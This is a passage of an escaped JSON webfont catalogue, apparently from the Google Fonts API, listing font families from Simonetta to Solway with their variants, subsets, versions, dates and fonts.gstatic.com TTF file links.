\"variants\": [\n        \"regular\",\n        \"italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/simonetta/v23/x3dickHVYrCU5BU15c4BfPACvy_1BA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/simonetta/v23/x3dkckHVYrCU5BU15c4xfvoGnSrlBBsy.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/simonetta/v23/x3dnckHVYrCU5BU15c45-N0mtwTpDQIrGg.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/simonetta/v23/x3d5ckHVYrCU5BU15c4xfsKCsA7tLwc7Gn88.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Single Day\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/singleday/v15/LYjHdGDjlEgoAcF95EI5jVoFUNfeQJU.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sintony\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sintony/v13/XoHm2YDqR7-98cVUITQnu98ojjs.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sintony/v13/XoHj2YDqR7-98cVUGYgIn9cDkjLp6C8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sirin Stencil\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sirinstencil/v21/mem4YaWwznmLx-lzGfN7MdRydchGBq6al6o.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Six Caps\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sixcaps/v16/6ae_4KGrU7VR7bNmabcS9XXaPCop.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Skranji\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/skranji/v13/OZpDg_dtriVFNerMYzuuklTm3Ek.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/skranji/v13/OZpGg_dtriVFNerMW4eBtlzNwED-b4g.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Slabo 13px\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/slabo13px/v13/11hEGp_azEvXZUdSBzzRcKer2wkYnvI.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Slabo 27px\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/slabo27px/v12/mFT0WbgBwKPR_Z4hGN2qsxgJ1EJ7i90.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Slackey\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/slackey/v24/N0bV2SdQO-5yM0-dKlRaJdbWgdY.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Smokum\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/smokum/v24/TK3iWkUbAhopmrdGHjUHte5fKg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Smooch\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/smooch/v5/o-0LIps4xW8U1xUBjqp_6hVdYg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Smooch Sans\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiwUFodqIeNlzayg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiQUBodqIeNlzayg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oin0BodqIeNlzayg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiwUBodqIeNlzayg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oi80BodqIeNlzayg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiH0dodqIeNlzayg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiJkdodqIeNlzayg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiQUdodqIeNlzayg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiaEdodqIeNlzayg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Smythe\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/smythe/v23/MwQ3bhT01--coT1BOLh_uGInjA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sniglet\",\n      \"variants\": [\n        \"regular\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sniglet/v17/cIf9MaFLtkE3UjaJxCmrYGkHgIs.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sniglet/v17/cIf4MaFLtkE3UjaJ_ImHRGEsnIJkWL4.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Snippet\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/snippet/v21/bWt47f7XfQH9Gupu2v_Afcp9QWc.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Snowburst One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/snowburstone/v20/MQpS-WezKdujBsXY3B7I-UT7eZ-UPyacPbo.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sofadi One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sofadione/v21/JIA2UVBxdnVBuElZaMFGcDOIETkmYDU.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sofia\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sofia/v14/8QIHdirahM3j_vu-sowsrqjk.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sofia Sans\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2023-02-02\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6E-LCVXSLy9uPBwlAThu1SY8Cx8rlT69B6sa3trvKCXl8k.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6E-LCVXSLy9uPBwlAThu1SY8Cx8rlT69D6sK3trvKCXl8k.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6E-LCVXSLy9uPBwlAThu1SY8Cx8rlT69AksK3trvKCXl8k.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6E-LCVXSLy9uPBwlAThu1SY8Cx8rlT69B6sK3trvKCXl8k.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6E-LCVXSLy9uPBwlAThu1SY8Cx8rlT69BIsK3trvKCXl8k.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6E-LCVXSLy9uPBwlAThu1SY8Cx8rlT69Ckt63trvKCXl8k.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6E-LCVXSLy9uPBwlAThu1SY8Cx8rlT69Cdt63trvKCXl8k.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6E-LCVXSLy9uPBwlAThu1SY8Cx8rlT69D6t63trvKCXl8k.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6E-LCVXSLy9uPBwlAThu1SY8Cx8rlT69DTt63trvKCXl8k.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6G-LCVXSLy9uPBwlATrORgnBjYmSP97MWy80WvpPagW08kdLY.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6G-LCVXSLy9uPBwlATrORgnBjYmSP97MWy88WupPagW08kdLY.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6G-LCVXSLy9uPBwlATrORgnBjYmSP97MWy8xuupPagW08kdLY.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6G-LCVXSLy9uPBwlATrORgnBjYmSP97MWy80WupPagW08kdLY.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6G-LCVXSLy9uPBwlATrORgnBjYmSP97MWy83eupPagW08kdLY.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6G-LCVXSLy9uPBwlATrORgnBjYmSP97MWy85uppPagW08kdLY.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6G-LCVXSLy9uPBwlATrORgnBjYmSP97MWy86KppPagW08kdLY.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6G-LCVXSLy9uPBwlATrORgnBjYmSP97MWy88WppPagW08kdLY.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/sofiasans/v13/Yq6G-LCVXSLy9uPBwlATrORgnBjYmSP97MWy8-yppPagW08kdLY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sofia Sans Condensed\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2023-02-02\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r05xGKVS5aVKd567NYXawnFKJaTtoAuLnK0EjiAN5s9CZwUqh-Csl8QO3OfwQQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r05xGKVS5aVKd567NYXawnFKJaTtoAuLnK0EjiAN5s9CZwUqB-Gsl8QO3OfwQQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r05xGKVS5aVKd567NYXawnFKJaTtoAuLnK0EjiAN5s9CZwUq2eGsl8QO3OfwQQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r05xGKVS5aVKd567NYXawnFKJaTtoAuLnK0EjiAN5s9CZwUqh-Gsl8QO3OfwQQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r05xGKVS5aVKd567NYXawnFKJaTtoAuLnK0EjiAN5s9CZwUqteGsl8QO3OfwQQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r05xGKVS5aVKd567NYXawnFKJaTtoAuLnK0EjiAN5s9CZwUqWeasl8QO3OfwQQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r05xGKVS5aVKd567NYXawnFKJaTtoAuLnK0EjiAN5s9CZwUqYOasl8QO3OfwQQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r05xGKVS5aVKd567NYXawnFKJaTtoAuLnK0EjiAN5s9CZwUqB-asl8QO3OfwQQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r05xGKVS5aVKd567NYXawnFKJaTtoAuLnK0EjiAN5s9CZwUqLuasl8QO3OfwQQ.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r053GKVS5aVKd567NYXawnFKJaTtoAuLnIcNvN_Vj6TYyQI_T6JE1c4K_uLgQZ_3.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r053GKVS5aVKd567NYXawnFKJaTtoAuLnIcNvN_Vj6TYyQI_T6LE1M4K_uLgQZ_3.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r053GKVS5aVKd567NYXawnFKJaTtoAuLnIcNvN_Vj6TYyQI_T6Ia1M4K_uLgQZ_3.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r053GKVS5aVKd567NYXawnFKJaTtoAuLnIcNvN_Vj6TYyQI_T6JE1M4K_uLgQZ_3.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r053GKVS5aVKd567NYXawnFKJaTtoAuLnIcNvN_Vj6TYyQI_T6J21M4K_uLgQZ_3.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r053GKVS5aVKd567NYXawnFKJaTtoAuLnIcNvN_Vj6TYyQI_T6Ka084K_uLgQZ_3.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r053GKVS5aVKd567NYXawnFKJaTtoAuLnIcNvN_Vj6TYyQI_T6Kj084K_uLgQZ_3.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r053GKVS5aVKd567NYXawnFKJaTtoAuLnIcNvN_Vj6TYyQI_T6LE084K_uLgQZ_3.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/sofiasanscondensed/v2/r053GKVS5aVKd567NYXawnFKJaTtoAuLnIcNvN_Vj6TYyQI_T6Lt084K_uLgQZ_3.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sofia Sans Extra Condensed\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2023-02-02\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxdHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0d6iDr-MD5Si9NGLmmmEfzmM356GxA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxdHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0d6iDr-MD5Si9NGLGmiEfzmM356GxA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxdHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0d6iDr-MD5Si9NGLxGiEfzmM356GxA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxdHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0d6iDr-MD5Si9NGLmmiEfzmM356GxA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxdHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0d6iDr-MD5Si9NGLqGiEfzmM356GxA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxdHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0d6iDr-MD5Si9NGLRG-EfzmM356GxA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxdHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0d6iDr-MD5Si9NGLfW-EfzmM356GxA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxdHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0d6iDr-MD5Si9NGLGm-EfzmM356GxA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxdHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0d6iDr-MD5Si9NGLM2-EfzmM356GxA.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxfHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0fSrPEBUZv84WtaeUitsPTOI_ZuWxFXe.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxfHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0fSrPEBUZv84WtaeUivsPDOI_ZuWxFXe.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxfHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0fSrPEBUZv84WtaeUisyPDOI_ZuWxFXe.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxfHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0fSrPEBUZv84WtaeUitsPDOI_ZuWxFXe.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxfHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0fSrPEBUZv84WtaeUitePDOI_ZuWxFXe.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxfHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0fSrPEBUZv84WtaeUiuyOzOI_ZuWxFXe.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxfHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0fSrPEBUZv84WtaeUiuLOzOI_ZuWxFXe.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxfHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0fSrPEBUZv84WtaeUivsOzOI_ZuWxFXe.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/sofiasansextracondensed/v2/raxfHjafvdAIOju4GcIfJH0i7zi50X3zRtuLNiMS0fSrPEBUZv84WtaeUivFOzOI_ZuWxFXe.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sofia Sans Semi Condensed\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2023-02-02\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kOlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURm28cA7YLHsIVvoobEO9TGahllIhN.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kOlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURm28cA7YLHsIVvoqbEe9TGahllIhN.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kOlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURm28cA7YLHsIVvopFEe9TGahllIhN.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kOlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURm28cA7YLHsIVvoobEe9TGahllIhN.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kOlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURm28cA7YLHsIVvoopEe9TGahllIhN.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kOlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURm28cA7YLHsIVvorFFu9TGahllIhN.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kOlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURm28cA7YLHsIVvor8Fu9TGahllIhN.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kOlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURm28cA7YLHsIVvoqbFu9TGahllIhN.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kOlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURm28cA7YLHsIVvoqyFu9TGahllIhN.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kMlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURsWYu_G5idVi7uZ_TUgcRE6xHkZhNeas.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kMlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURsWYu_G5idVi7uZ_TUocQE6xHkZhNeas.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kMlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURsWYu_G5idVi7uZ_TUlkQE6xHkZhNeas.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kMlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURsWYu_G5idVi7uZ_TUgcQE6xHkZhNeas.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kMlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURsWYu_G5idVi7uZ_TUjUQE6xHkZhNeas.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kMlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURsWYu_G5idVi7uZ_TUtkXE6xHkZhNeas.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kMlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURsWYu_G5idVi7uZ_TUuAXE6xHkZhNeas.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kMlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURsWYu_G5idVi7uZ_TUocXE6xHkZhNeas.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/sofiasanssemicondensed/v2/46kMlaPnUDrQoNsWDCGXXxYlujh5Wv0nwP4RwxURsWYu_G5idVi7uZ_TUq4XE6xHkZhNeas.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Solitreo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2023-01-18\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/solitreo/v1/r05YGLlS5a9KYsyNO8upyDYtStiJ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Solway\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/solway/v17/AMOTz46Cs2uTAOCuLlgZms0QW3mqyg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/solway/v17/AMOQz46Cs2uTAOCWgnA9kuYMUg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/solway/v17/AMOTz46Cs2uTAOCudlkZms0QW3mqyg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/solway/v17/AMOTz46Cs2uTAOCuPl8Zms0QW3mqyg.ttf\",\n        \"800\": 